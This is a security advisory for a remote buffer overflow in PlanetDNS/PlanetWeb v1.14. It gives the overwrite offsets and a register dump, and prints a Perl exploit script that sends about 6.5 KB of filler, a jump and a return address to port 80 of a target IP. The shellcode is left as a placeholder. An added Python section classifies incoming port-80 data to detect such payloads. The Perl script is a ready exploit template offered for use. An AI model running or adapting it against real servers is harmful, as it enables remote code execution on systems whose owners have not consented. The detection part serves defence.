PlanetDNS v1.14 remote buffer overflow exploit which sends 6K of data to port 80 of PlanetWeb.
f9b9023362601fc0dd91c3c2596c3a5dbacc94a522db51d9b2b684122fa16bb3
hi
PlanetDNS (http://www.planetdns.net) is a
commercial software package that allows you to
turn a computer into an Internet server,
create an Internet name, and connect to
a web server, FTP server, mail server, etc. running
on the computer.
PlanetDNS is vulnerable to a buffer overflow with an
overwrite of eip (never posted before)... It was already
reported that 1024 bytes could crash the
server, and I found that sending 6500 bytes (without GET /)
overwrites eip and allows execution of
shellcode. The overwrite is done with bytes 6449, 6450, 6451
and 6452.
Note also that ebx is always 4 bytes before the
eip, so the ret address will be a jmp ebx or call ebx, which
can be found in many loaded modules.
I wrote an exploit, tested on PlanetWeb v1.14, which
gives the following register state:
Access violation - code c0000005 (first chance)
eax=0217dfb0 ebx=0217ffdc ecx=43434343 edx=7846f5b5 esi=0217dfd8 edi=00000000
eip=43434343 esp=0217df18 ebp=0217df38 iopl=0 nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
43434343 ?? ???
exploit code:
#!/usr/bin/perl -w
#tool bop.pl
# buffer overflow tested against PlanetWeb v1.14
# humm..this exploit is not for lamers...
# Greetz: marocit and #crack.fr (specialemet
#
use IO::Socket;
if ($#ARGV<0)
{
print "\n write the target IP!! \n\n";
exit;
}
$shellcode = ("YOURFAVORITSHELLCODEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
# add your favorite shellcode
$buffer = "A"x6444;
$ebx = "\x90\xEB\x08\x90";# you have the chance because ebx = eip - 4 bytes jmp short 0xff x0d3
$ret = "\x43\x43\x43\x43";# insert your ret address with (jmp ebx or call ebx)
$minibuf ="\x90\x90\x90\x90";# will be jumped by EB08
$connect = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ARGV[0]", PeerPort => "80");
unless ($connect) { die "cant connect $ARGV[0]" }
print $connect "$buffer$ebx$ret$minibuf$shellcode";
print "\nsending exploit......\n\n";
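
Detection side of the behaviour described above, as an added example that is not part of the original post: a pre-parse check for data arriving on port 80 that flags the two traits the advisory reports, namely no "GET /" request line and a length at or past the reported 1024-byte crash size or the byte-6449 return-address offset. The function names, the request-line pattern and the verdict labels are assumptions made for this example, and the sample payloads are constructed, not captured traffic.

```python
import re
from itertools import groupby

# Thresholds taken from the advisory text: about 1024 bytes was reported to
# crash the server, and the eip overwrite sits at bytes 6449-6452.
CRASH_LEN = 1024
EIP_OFFSET = 6448  # zero-based index of byte 6449
# Assumed shape of a legitimate request line (example pattern, not PlanetWeb's parser).
REQUEST_LINE = re.compile(rb"^[A-Z]{3,10} \S+ HTTP/\d\.\d$")


def longest_run(data: bytes) -> int:
    """Length of the longest run of one repeated byte (filler or padding)."""
    return max((sum(1 for _ in grp) for _, grp in groupby(data)), default=0)


def classify(payload: bytes) -> dict:
    """Inspect what a client sent to port 80 before the server parses it."""
    first_line = payload.split(b"\n", 1)[0].rstrip(b"\r")
    reasons = []
    if not REQUEST_LINE.match(first_line):
        reasons.append("no-http-request-line")
    if len(first_line) >= CRASH_LEN:
        reasons.append("first-line>=1024")
    if len(payload) > EIP_OFFSET:
        reasons.append("reaches-return-address-offset")
    if longest_run(payload) >= CRASH_LEN:
        reasons.append("long-filler-run")
    # Oversized data with no request line matches the advisory's description.
    if "no-http-request-line" in reasons and len(reasons) > 1:
        verdict = "alert"
    elif reasons:
        verdict = "suspicious"
    else:
        verdict = "ok"
    return {"verdict": verdict, "reasons": reasons, "length": len(payload)}


# Constructed sample payloads; the last one only mimics the size and layout
# of the overflow data, with zero bytes where pointers would be.
SAMPLES = {
    "normal": b"GET /index.html HTTP/1.0\r\nHost: example.test\r\n\r\n",
    "long_url": b"GET /" + b"a" * 2000 + b" HTTP/1.0\r\n\r\n",
    "raw_filler": b"A" * 6444 + b"\x00" * 8 + b"B" * 48,
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(name, classify(data))
```

The same limits can be enforced by a reverse proxy in front of the server, rejecting any first line of 1024 bytes or more before it reaches PlanetWeb.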